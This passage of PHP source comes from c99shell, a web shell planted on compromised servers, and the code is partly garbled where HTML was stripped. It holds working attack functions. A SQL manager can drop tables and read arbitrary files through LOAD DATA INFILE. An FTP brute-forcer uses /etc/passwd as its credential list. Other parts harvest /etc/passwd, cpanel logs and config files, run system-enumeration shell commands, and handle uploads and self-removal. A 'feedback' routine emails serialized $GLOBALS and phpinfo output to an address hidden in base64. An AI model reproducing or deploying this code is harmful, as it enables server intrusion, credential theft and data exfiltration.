intval($line[1]); $line[2] = $line[3]; unset($line[3]); $line[2] = intval(str_replace(" ", "", $line[2])) * 1024; $prcs[] = $line; echo ""; } } } $head[$k] = "" . $head[$k] . "" . $y; $v = $processes_sort[0]; usort($prcs, "tabsort"); if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); } $tab = array(); $tab[] = $head; $tab = array_merge($tab, $prcs); echo "

"; if ($act == "") { $act = $dspact = "ls"; } if ($act == "sql") { $sql_surl = $surl . "act=sql"; if ($sql_login) { $sql_surl .= "&sql_login=" . htmlspecialchars($sql_login); } if ($sql_passwd) { $sql_surl .= "&sql_passwd=" . htmlspecialchars($sql_passwd); } if ($sql_server) { $sql_surl .= "&sql_server=" . htmlspecialchars($sql_server); } if ($sql_port) { $sql_surl .= "&sql_port=" . htmlspecialchars($sql_port); } if ($sql_db) { $sql_surl .= "&sql_db=" . htmlspecialchars($sql_db); } $sql_surl .= "&";?>"; if (!$sql_sock) { ?>"; } echo " SQL Manager: "; if (!$sql_sock) { if (!$sql_server) { echo "NO CONNECTION"; } else { echo "Can't connect"; echo "" . $err . ""; } } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array( "Index", $surl . "act=sql&sql_login=" . htmlspecialchars($sql_login) . "&sql_passwd=" . htmlspecialchars($sql_passwd) . "&sql_server=" . htmlspecialchars($sql_server) . "&sql_port=" . htmlspecialchars($sql_port) . "&" ); $sqlquicklaunch[] = array( "Query", $sql_surl . "sql_act=query&sql_tbl=" . urlencode($sql_tbl) ); $sqlquicklaunch[] = array( "Server-status", $surl . "act=sql&sql_login=" . htmlspecialchars($sql_login) . "&sql_passwd=" . htmlspecialchars($sql_passwd) . "&sql_server=" . htmlspecialchars($sql_server) . "&sql_port=" . htmlspecialchars($sql_port) . "&sql_act=serverstatus" ); $sqlquicklaunch[] = array( "Server variables", $surl . "act=sql&sql_login=" . htmlspecialchars($sql_login) . "&sql_passwd=" . htmlspecialchars($sql_passwd) . "&sql_server=" . htmlspecialchars($sql_server) . "&sql_port=" . htmlspecialchars($sql_port) . "&sql_act=servervars" ); $sqlquicklaunch[] = array( "Processes", $surl . "act=sql&sql_login=" . htmlspecialchars($sql_login) . "&sql_passwd=" . htmlspecialchars($sql_passwd) . "&sql_server=" . htmlspecialchars($sql_server) . "&sql_port=" . htmlspecialchars($sql_port) . "&sql_act=processes" ); $sqlquicklaunch[] = array( "Logout", $surl . "act=sql" ); echo "MySQL " . mysqli_get_server_info() . " (proto v." . mysqli_get_proto_info() . ") running in " . htmlspecialchars($sql_server) . ":" . htmlspecialchars($sql_port) . " as " . htmlspecialchars($sql_login) . "@" . htmlspecialchars($sql_server) . " (password - \"" . htmlspecialchars($sql_passwd) . "\") "; if (count($sqlquicklaunch) > 0) { foreach ($sqlquicklaunch as $item) { echo "[ " . $item[0] . " ] "; } } echo ""; } echo " Info If login is null, login is owner of process. If host is null, host is localhost If port is null, port is 3306 (default)  Please, fill the form: Username Password  Database  Host PORT ">Home " . htmlspecialchars($sql_db) . " ]--- "; $c = 0; while ($row = mysqli_fetch_array($result)) { $count = mysqli_query($sql_sock, "SELECT COUNT(*) FROM " . $row[0]); $count_row = mysqli_fetch_array($count); echo "» " . htmlspecialchars($row[0]) . " (" . $count_row[0] . ") "; mysqli_free_result($count); $c++; } if (!$c) { echo "No tables found in database."; } } } else { ?> Home " . $row[0] . ""; $c++; } echo "Databases (" . $c . ")"; echo $dbs; } ?> Please, select database "; $diplay = true; if ($sql_db) { if (!is_numeric($c)) { $c = 0; } if ($c == 0) { $c = "no"; } echo " There are " . $c . " table(s) in this DB (" . htmlspecialchars($sql_db) . "). "; if (count($dbquicklaunch) > 0) { foreach ($dbsqlquicklaunch as $item) { echo "[ " . $item[0] . " ] "; } } echo ""; $acts = array( "", "dump" ); if ($sql_act == "tbldrop") { $sql_query = "DROP TABLE"; foreach ($boxtbl as $v) { $sql_query .= "\n`" . $v . "` ,"; } $sql_query = substr($sql_query, 0, -1) . ";"; $sql_act = "query"; } elseif ($sql_act == "tblempty") { $sql_query = ""; foreach ($boxtbl as $v) { $sql_query .= "DELETE FROM `" . $v . "` \n"; } $sql_act = "query"; } elseif ($sql_act == "tbldump") { if (count($boxtbl) > 0) { $dmptbls = $boxtbl; } elseif ($thistbl) { $dmptbls = array( $sql_tbl ); } $sql_act = "dump"; } elseif ($sql_act == "tblcheck") { $sql_query = "CHECK TABLE"; foreach ($boxtbl as $v) { $sql_query .= "\n`" . $v . "` ,"; } $sql_query = substr($sql_query, 0, -1) . ";"; $sql_act = "query"; } elseif ($sql_act == "tbloptimize") { $sql_query = "OPTIMIZE TABLE"; foreach ($boxtbl as $v) { $sql_query .= "\n`" . $v . "` ,"; } $sql_query = substr($sql_query, 0, -1) . ";"; $sql_act = "query"; } elseif ($sql_act == "tblrepair") { $sql_query = "REPAIR TABLE"; foreach ($boxtbl as $v) { $sql_query .= "\n`" . $v . "` ,"; } $sql_query = substr($sql_query, 0, -1) . ";"; $sql_act = "query"; } elseif ($sql_act == "tblanalyze") { $sql_query = "ANALYZE TABLE"; foreach ($boxtbl as $v) { $sql_query .= "\n`" . $v . "` ,"; } $sql_query = substr($sql_query, 0, -1) . ";"; $sql_act = "query"; } elseif ($sql_act == "deleterow") { $sql_query = ""; if (!empty($boxrow_all)) { $sql_query = "DELETE FROM `" . $sql_tbl . "`;"; } else { foreach ($boxrow as $v) { $sql_query .= "DELETE FROM `" . $sql_tbl . "` WHERE" . $v . " LIMIT 1;\n"; } $sql_query = substr($sql_query, 0, -1); } $sql_act = "query"; } elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) { $keys .= "`" . addslashes($v) . "`, "; } if (!empty($keys)) { $keys = substr($keys, 0, strlen($keys) - 2); } $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) { if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) { $values .= $funct . " ("; } $values .= "'" . addslashes($v) . "'"; if ($funct) { $values .= ")"; } $values .= ", "; $i++; } if (!empty($values)) { $values = substr($values, 0, strlen($values) - 2); } $sql_query = "INSERT INTO `" . $sql_tbl . "` ( " . $keys . " ) VALUES ( " . $values . " );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysqli_buildwhere($sql_tbl_insert, ", ", $sql_tbl_insert_functs); $sql_query = "UPDATE `" . $sql_tbl . "` SET " . $set . " WHERE " . $sql_tbl_insert_q . " LIMIT 1;"; $result = mysqli_query($sql_sock, $sql_query) or print (mysqli_smarterror($sql_sock)); $result = mysqli_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo " "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) { if (!$sql_query_error) { $sql_query_error = "Query was empty"; } echo "Error: " . $sql_query_error . " "; } if ($sql_query_result or (!$sql_confirm)) { $sql_act = $sql_goto; } if ((!$submit) or ($sql_act)) { echo " "; if (($sql_query) and (!$submit)) { echo "Do you really want to:"; } else { echo "SQL-Query :"; } echo " " . htmlspecialchars($sql_query) . "   "; echo " "; } if ($submit and $sql_query_result and $sql_confirm) { echo "Query result: "; $check = 0; while ($row = mysqli_fetch_array($sql_query_result, MYSQLI_NUM)) { $check = 1; echo ""; foreach ($row as $r) { echo ""; } echo ""; } if ($check == 0) { echo ""; } echo " $r Query OK, no results to show "; } } if (in_array($sql_act, $acts)) { ?> Dump DB: ">  "; } if ($sql_act == "newtbl") { echo ""; if ((mysqli_create_db($sql_sock, $sql_newdb)) and (!empty($sql_newdb))) { echo "DB \"" . htmlspecialchars($sql_newdb) . "\" has been created with success! "; } else { echo "Can't create DB \"" . htmlspecialchars($sql_newdb) . "\". Reason: " . mysqli_smarterror($sql_sock); } } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = false; echo " "; //echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "[ Insert ]   "; echo " "; echo " SQL-Dump: "; echo "DB:  "; $v = join(";", $dmptbls); echo "Only tables (explode \";\") 1:  "; if ($dump_file) { $tmp = $dump_file; } else { $tmp = htmlspecialchars("./dump_" . getenv("SERVER_NAME") . "_" . $sql_db . "_" . date("d-m-Y-H-i-s") . ".sql"); } echo "File:  "; echo "Download:   "; echo "Save to file:  "; echo " 1 - all, if empty"; echo " "; } else { $diplay = true; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = true; $set["onlytabs"] = array(); if (!empty($dmptbls)) { $set["onlytabs"] = explode(";", $dmptbls); } $ret = mysqli_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: " . strlen($ret)); header("Content-disposition: attachment; filename=\"" . basename($sql_dump_file) . "\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file, "w"); if (!$fp) { echo "Dump error! Can't write to \"" . htmlspecialchars($sql_dump_file) . "\"!"; } else { fwrite($fp, $ret); fclose($fp); echo "Dumped! Dump has been writed to \"" . htmlspecialchars(realpath($sql_dump_file)) . "\" (" . view_size(filesize($sql_dump_file)) . ")."; } } else { echo "Dump: nothing to do!"; } } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) { $sql_tbl_act = "browse"; } $count = mysqli_query($sql_sock, "SELECT COUNT(*) FROM `" . $sql_tbl . "`;"); $count_row = mysqli_fetch_array($count); mysqli_free_result($count); $tbl_struct_result = mysqli_query($sql_sock, "SHOW FIELDS FROM `" . $sql_tbl . "`;"); $tbl_struct_fields = array(); while ($row = mysqli_fetch_assoc($tbl_struct_result)) { $tbl_struct_fields[] = $row; } if ($sql_ls > $sql_le) { $sql_le = $sql_ls + $perpage; } if (empty($sql_tbl_page)) { $sql_tbl_page = 0; } if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; } if (empty($sql_tbl_le)) { $sql_tbl_le = 30; } $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) { $perpage = 10; } $numpages = $count_row[0] / $perpage; $e = explode(" ", $sql_order); if (count($e) == 2) { if ($e[0] == "d") { $asc_desc = "DESC"; } else { $asc_desc = "ASC"; } $v = "ORDER BY `" . $e[1] . "` " . $asc_desc . " "; } else { $v = ""; } $query = "SELECT * FROM `" . $sql_tbl . "` " . $v . "LIMIT " . $sql_tbl_ls . " , " . $perpage . ""; $result = mysqli_query($sql_sock, $query) or print (mysqli_smarterror($sql_sock)); echo " Table " . htmlspecialchars($sql_tbl) . " (" . mysqli_num_fields($result) . " cols and " . $count_row[0] . " rows)"; //echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "[ Insert ]   "; if ($sql_tbl_act == "structure") { echo " Coming sooon!"; } if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) { $sql_tbl_insert = array(); } if (!empty($sql_tbl_insert_radio)) { } else { echo " Inserting row into table: "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `" . $sql_tbl . "`"; $sql_query .= " WHERE" . $sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysqli_query($sql_sock, $sql_query) or print (" " . mysqli_smarterror($sql_sock)); $values = mysqli_fetch_assoc($result); mysqli_free_result($result); } else { $values = array(); } echo " "; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) { $v = ""; } echo ""; $i++; } echo " Field Type Function Value " . htmlspecialchars($name) . " " . $field["Type"] . " PASSWORDMD5ENCRYPTASCIICHARRANDLAST_INSERT_IDCOUNTAVGSUM--------SOUNDEXLCASEUCASENOWCURDATECURTIMEFROM_DAYSFROM_UNIXTIMEPERIOD_ADDPERIOD_DIFFTO_DAYSUNIX_TIMESTAMPUSERWEEKDAYCONCAT "; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) { echo " or Save"; echo ""; } echo " "; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo " "; echo " "; $b = 0; for ($i = 0;$i < $numpages;$i++) { if (($i * $perpage != $sql_tbl_ls) or ($i * $perpage + $perpage != $sql_tbl_le)) { echo ""; } echo $i; if (($i * $perpage != $sql_tbl_ls) or ($i * $perpage + $perpage != $sql_tbl_le)) { echo ""; } if (($i / 30 == round($i / 30)) and ($i > 0)) { echo " "; } else { echo " "; } } if ($i == 0) { echo "empty"; } echo " From:  To:   "; echo " "; echo ""; echo ""; for ($i = 0;$i < mysqli_num_fields($result);$i++) { $v = mysqli_field_name($result, $i); if ($e[0] == "a") { $s = "d"; $m = "asc"; } else { $s = "a"; $m = "desc"; } echo ""; } echo ""; echo ""; while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k => $v) { $name = mysqli_field_name($result, $i); $w .= " `" . $name . "` = '" . addslashes($v) . "' AND"; $i++; } if (count($row) > 0) { $w = substr($w, 0, strlen($w) - 3); } echo ""; $i = 0; foreach ($row as $k => $v) { $v = htmlspecialchars($v); if ($v == "") { $v = "NULL"; } echo ""; $i++; } echo ""; echo ""; } mysqli_free_result($result); echo " "; if (empty($e[0])) { $e[0] = "a"; } if ($e[1] != $v) { echo "" . $v . ""; } else { echo "" . $v . ""; } echo " Action " . $v . " "; echo " "; echo " "; echo " "; echo "With selected:"; echo "Delete"; echo "  "; } } else { $result = mysqli_query($sql_sock, "SHOW TABLE STATUS"); if (!$result) { echo mysqli_smarterror($sql_sock); } else { echo " "; $i = 0; $tsize = $trows = 0; while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo " Table Rows Type Created Modified Size Action  " . $row["Name"] . "  " . $row["Rows"] . " " . $row["Type"] . " " . $row["Create_time"] . " " . $row["Update_time"] . " " . $size . "       » " . $i . " table(s) " . $trows . " " . $row[1] . " " . $row[10] . " " . $row[11] . " " . view_size($tsize) . " "; echo "With selected:"; echo "Drop"; echo "Empty"; echo "Dump"; echo "Check table"; echo "Optimize table"; echo "Repair table"; echo "Analyze table"; echo "  "; mysqli_free_result($result); } } } } } else { $acts = array( "", "newdb", "serverstatus", "servervars", "processes", "getfile" ); if (in_array($sql_act, $acts)) { ?> Create new DB:   View File:   "; if (($sql_act == "query") and (!$sql_db)) { echo "Query is not possible, you need to select a database"; } if ($sql_act == "newdb") { echo ""; if ((mysqli_create_db($sql_sock, $sql_newdb)) and (!empty($sql_newdb))) { echo "DB \"" . htmlspecialchars($sql_newdb) . "\" has been created with success! "; } else { echo "Can't create DB \"" . htmlspecialchars($sql_newdb) . "\". Reason: " . mysqli_smarterror($sql_sock); } } if ($sql_act == "serverstatus") { $result = mysqli_query($sql_sock, "SHOW STATUS"); echo "Server-status variables: "; echo ""; while ($row = mysqli_fetch_array($result, MYSQLI_NUM)) { echo ""; } echo " Name Value " . $row[0] . " " . $row[1] . " "; mysqli_free_result($result); } if ($sql_act == "servervars") { $result = mysqli_query($sql_sock, "SHOW VARIABLES"); echo "Server variables: "; echo ""; while ($row = mysqli_fetch_array($result, MYSQLI_NUM)) { echo ""; } echo " Name Value " . $row[0] . " " . $row[1] . " "; mysqli_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) { $query = "KILL " . $kill . ";"; $result = mysqli_query($sql_sock, $query); echo "Killing process #" . $kill . "... ok. he is dead, amen."; } $result = mysqli_query($sql_sock, "SHOW PROCESSLIST"); echo "Processes: "; echo ""; while ($row = mysqli_fetch_array($result, MYSQLI_NUM)) { echo ""; } echo " ID USER HOST DB COMMAND TIME STATE INFO Action " . $row[0] . " " . $row[1] . " " . $row[2] . " " . $row[3] . " " . $row[4] . " " . $row[5] . " " . $row[6] . " " . $row[7] . " Kill "; mysqli_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login . "_tmpdb"; $select = mysqli_select_db($sql_sock, $tmpdb); if (!$select) { mysqli_create_db($sql_sock, $tmpdb); $select = mysqli_select_db($sql_sock, $tmpdb); $created = !!$select; } if ($select) { $created = false; mysqli_query($sql_sock, "CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysqli_query($sql_sock, "LOAD DATA INFILE \"" . addslashes($sql_getfile) . "\" INTO TABLE tmp_file"); $result = mysqli_query($sql_sock, "SELECT * FROM tmp_file;"); if (!$result) { echo "Error in reading file (permision denied)!"; } else { for ($i = 0;$i < mysqli_num_fields($result);$i++) { $name = mysqli_field_name($result, $i); } $f = ""; while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC)) { $f .= join("\r\n", $row); } if (empty($f)) { echo "File \"" . $sql_getfile . "\" does not exists or empty! "; } else { echo "File \"" . $sql_getfile . "\": " . nl2br(htmlspecialchars($f)) . " "; } mysqli_free_result($result); mysqli_query($sql_sock, "DROP TABLE tmp_file;"); } } mysqli_drop_db($sql_sock, $tmpdb); } } } } echo " "; if ($sql_sock) { $affected = @mysqli_affected_rows($sql_sock); if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; } echo " Affected rows: " . $affected . " "; } if ($act == "mkdir") { if ($mkdir != $d) { if (file_exists($mkdir)) { echo "Make Dir \"" . htmlspecialchars($mkdir) . "\": object alredy exists"; } elseif (!mkdir($mkdir)) { echo "Make Dir \"" . htmlspecialchars($mkdir) . "\": access denied"; } echo " "; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if (!win) { echo "This functions not work in Windows! "; } else { function c99ftpbrutecheck($host, $port, $timeout, $login, $pass, $sh, $fqb_onlywithsh) { if ($fqb_onlywithsh) { $true = (!in_array($sh, array( "/bin/false", "/sbin/nologin" ))); } else { $true = true; } if ($true) { $sock = @ftp_connect($host, $port, $timeout); if (@ftp_login($sock, $login, $pass)) { echo "Connected to " . $host . " with login \"" . $login . "\" and password \"" . $pass . "\". "; ob_flush(); return true; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) { $fqb_lenght = $nixpwdperpage; } $fp = fopen("/etc/passwd", "r"); if (!$fp) { echo "Can't get /etc/passwd for password-list."; } else { if ($fqb_logging) { if ($fqb_logfile) { $fqb_logfp = fopen($fqb_logfile, "w"); } else { $fqb_logfp = false; } $fqb_log = "FTP Quick Brute (called c99shell v. " . $shver . ") started at " . date("d.m.Y H:i:s") . "\r\n\r\n"; if ($fqb_logfile) { fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while (!feof($fp)) { $str = explode(":", fgets($fp, 2048)); if (c99ftpbrutecheck("localhost", 21, 1, $str[0], $str[0], $str[6], $fqb_onlywithsh)) { echo "Connected to " . getenv("SERVER_NAME") . " with login \"" . $str[0] . "\" and password \"" . $str[0] . "\" "; $fqb_log .= "Connected to " . getenv("SERVER_NAME") . " with login \"" . $str[0] . "\" and password \"" . $str[0] . "\", at " . date("d.m.Y H:i:s") . "\r\n"; if ($fqb_logfp) { fseek($fqb_logfp, 0); fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } $success++; ob_flush(); } if ($i > $fqb_lenght) { break; } $i++; } if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; } $ftpquick_t = round(getmicrotime() - $ftpquick_st, 4); echo " Done! Total time (secs.): " . $ftpquick_t . " Total connections: " . $i . " Success.: " . $success . " Unsuccess.:" . ($i - $success) . " Connects per second: " . round($i / $ftpquick_t, 2) . " "; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): " . $ftpquick_t . "\r\nTotal connections: " . $i . "\r\nSuccess.: " . $success . "\r\nUnsuccess.:" . ($i - $success) . "\r\nConnects per second: " . round($i / $ftpquick_t, 2) . "\r\n"; if ($fqb_logfp) { fseek($fqb_logfp, 0); fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } if ($fqb_logemail) { @mail($fqb_logemail, "c99shell v. " . $shver . " report", $fqb_log); } fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs . "c99sh_ftpquickbrute_" . date("d.m.Y_H_i_s") . ".log"; $logfile = str_replace("//", DIRECTORY_SEPARATOR, $logfile); echo " Read first: Users only with shell?  Logging?  Logging to file?  Logging to e-mail?  "; } } } if ($act == "d") { if (!is_dir($d)) { echo "Permision denied!"; } else { echo "Directory information:"; if (!$win) { echo " Owner/Group "; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow["name"] ? $ow["name"] : fileowner($d)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d)); } echo " Perms " . view_perms_color($d) . " Create time " . date("d/m/Y H:i:s", filectime($d)) . " Access time " . date("d/m/Y H:i:s", fileatime($d)) . " MODIFY time " . date("d/m/Y H:i:s", filemtime($d)) . " "; } } if ($act == "phpinfo") { @ob_clean(); phpinfo(); c99shexit(); } if ($act == "security") { echo "Server security information:Open base dir: " . $hopenbasedir . " "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) { $nixpasswd = 0; } echo "*nix /etc/passwd: "; if (!is_numeric($nixpwd_s)) { $nixpwd_s = 0; } if (!is_numeric($nixpwd_e)) { $nixpwd_e = $nixpwdperpage; } echo " From:  To:   "; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "" . $uid["dir"] . ""; echo join(":", $uid) . " "; } $i++; } } else { echo " Get /etc/passwd "; } } else { $v = $_SERVER["WINDIR"] . "\repair\sam"; if (file_get_contents($v)) { echo "You can't crack winnt passwords(" . $v . ") "; } else { echo "You can crack winnt passwords. Download, and use lcp.crack+ ©. "; } } if (file_get_contents("/etc/userdomains")) { echo "View cpanel user-domains logs "; } if (file_get_contents("/var/cpanel/accounting.log")) { echo "View cpanel logs "; } if (file_get_contents("/usr/local/apache/conf/httpd.conf")) { echo "Apache configuration (httpd.conf) "; } if (file_get_contents("/etc/httpd.conf")) { echo "Apache configuration (httpd.conf) "; } if (file_get_contents("/etc/syslog.conf")) { echo "Syslog configuration (syslog.conf) "; } if (file_get_contents("/etc/motd")) { echo "Message Of The Day "; } if (file_get_contents("/etc/hosts")) { echo "Hosts "; } function displaysecinfo($name, $value) { if (!empty($value)) { if (!empty($name)) { $name = "" . $name . " - "; } echo $name . nl2br($value) . " "; } } displaysecinfo("OS Version?", myshellexec("cat /proc/version")); displaysecinfo("Kernel version?", myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name", myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)", myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?", myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM", myshellexec("free -m")); displaysecinfo("HDD space", myshellexec("df -h")); displaysecinfo("List of Attributes", myshellexec("lsattr -a")); displaysecinfo("Mount options ", myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?", myshellexec("which curl")); displaysecinfo("Is lynx installed?", myshellexec("which lynx")); displaysecinfo("Is links installed?", myshellexec("which links")); displaysecinfo("Is fetch installed?", myshellexec("which fetch")); displaysecinfo("Is GET installed?", myshellexec("which GET")); displaysecinfo("Is perl installed?", myshellexec("which perl")); displaysecinfo("Where is apache", myshellexec("whereis apache")); displaysecinfo("Where is perl?", myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf", myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf", myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf", myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf", myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) { echo "Make File \"" . htmlspecialchars($mkfile) . "\": object alredy exists"; } elseif (!fopen($mkfile, "w")) { echo "Make File \"" . htmlspecialchars($mkfile) . "\": access denied"; } else { $act = "f"; $d = dirname($mkfile); if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $f = basename($mkfile); } } else { $act = $dspact = "ls"; } } if ($act == "encoder") { echo "Encoder: Input:" . @htmlspecialchars($encoder_input) . " Hashes: "; foreach (array( "md5", "crypt", "sha1", "crc32" ) as $v) { echo $v . " - "; } echo "Url: urlencode - urldecode - Base64:base64_encode - "; echo "base64_decode - "; if (base64_encode(base64_decode($encoder_input)) != $encoder_input) { echo ""; } else { $debase64 = base64_decode($encoder_input); $debase64 = str_replace("\0", "[0]", $debase64); $a = explode("\r\n", $debase64); $rows = count($a); $debase64 = htmlspecialchars($debase64); if ($rows == 1) { echo ""; } else { $rows++; echo "" . $debase64 . ""; } echo " ^"; } echo " Base convertations:dec2hex - "; } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy, $arr_cut); if (count($arr) == 0) { echo "Buffer is empty!"; } else { echo "File-System buffer "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls"; } } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using c99shell v." . $shver . "!"; c99shexit(); } else { echo "Can't delete " . __FILE__ . "!"; } } else { if (!empty($rndcode)) { echo "Error: incorrect confimation!"; } $rnd = rand(0, 9) . rand(0, 9) . rand(0, 9); echo " Self-remove: " . __FILE__ . " Are you sure? For confirmation, enter \"" . $rnd . "\":  "; } } if ($act == "update") { $ret = c99sh_getupdate(!!$confirmupdate); echo "" . $ret . ""; if (stristr($ret, "new version")) { echo " "; } } if ($act == "feedback") { $suppmail = base64_decode("c2VjdXJlaGFzaHBoaWxpcHBpbmVzQGdtYWlsLmNvbQ=="); if (!empty($submit)) { $ticket = substr(md5(microtime() + rand(1, 1000)) , 0, 6); $body = "c99shell v." . $shver . " feedback #" . $ticket . "\nName: " . htmlspecialchars($fdbk_name) . "\nE-mail: " . htmlspecialchars($fdbk_email) . "\nMessage:\n" . htmlspecialchars($fdbk_body) . "\n\nIP: " . $REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= "\n" . "phpinfo(): " . $phpinfo . "\n" . "\$GLOBALS=" . base64_encode(serialize($GLOBALS)) . "\n"; } mail($suppmail, "c99shell v." . $shver . " feedback #" . $ticket, $body, "FROM: " . $suppmail); echo "Thanks for your feedback! Your ticket ID: " . $ticket . "."; } else { echo " Feedback or report bug (" . str_replace(array( "@", "." ) , array( "[at]", "[dot]" ) , $suppmail) . "): Your name: Your e-mail: Message: " . htmlspecialchars($fdbk_body) . " Attach server-info * There are no checking in the form. * - strongly recommended, if you report bug, because we need it for bug-fix. We understand languages: English, Russian. "; } } if ($act == "search") { echo "Search in file-system: "; if (empty($search_in)) { $search_in = $d; } if (empty($search_name)) { $search_name = "(.*)"; $search_name_regexp = 1; } if (empty($search_text_wwo)) { $search_text_regexp = 0; } if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array( "name" => $search_name, "name_regexp" => $search_name_regexp, "text" => $search_text, "text_regexp" => $search_text_regxp, "text_wwo" => $search_text_wwo, "text_cs" => $search_text_cs, "text_not" => $search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";", $search_in)); foreach ($in as $v) { c99fsearch($v); } $searchtime = round(getmicrotime() - $searchtime, 4); if (count($found) == 0) { echo "No files found!"; } else { $ls_arr = $found; $disp_fullpath = true; $act = "ls"; } } echo " Search for (file/folder name):   - regexp Search in (explode \";\"): Text: " . htmlspecialchars($search_text) . " - regexp    - whole words only    - case sensitive    - find files NOT containing the text "; if ($act == "ls") { $dspact = $act; echo " Search took " . $searchtime . " secs (" . $search_i_f . " files and " . $search_i_d . " folders, " . round(($search_i_f + $search_i_d) / $searchtime, 4) . " objects per second). "; } } if ($act == "chmod") { $mode = fileperms($d . $f); if (!$mode) { echo "Change file-mode with error: can't get current value."; } else { $form = true; if ($chmod_submit) { $octet = "0" . base_convert(($chmod_o["r"] ? 1 : 0) . ($chmod_o["w"] ? 1 : 0) . ($chmod_o["x"] ? 1 : 0) . ($chmod_g["r"] ? 1 : 0) . ($chmod_g["w"] ? 1 : 0) . ($chmod_g["x"] ? 1 : 0) . ($chmod_w["r"] ? 1 : 0) . ($chmod_w["w"] ? 1 : 0) . ($chmod_w["x"] ? 1 : 0) , 2, 8); if (chmod($d . $f, $octet)) { $act = "ls"; $form = false; $err = ""; } else { $err = "Can't chmod to " . $octet . "."; } } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (" . $d . $f . "), " . view_perms_color($d . $f) . " (" . substr(decoct(fileperms($d . $f)) , -4, 4) . ") " . ($err ? "Error: " . $err : "") . " Owner  Read  Write eXecute Group  Read  Write eXecute World  Read  Write eXecute "; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\\", DIRECTORY_SEPARATOR, $uploadpath); if (empty($uploadpath)) { $uploadpath = $d; } elseif (substr($uploadpath, -1) != "/") { $uploadpath .= "/"; } if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) { 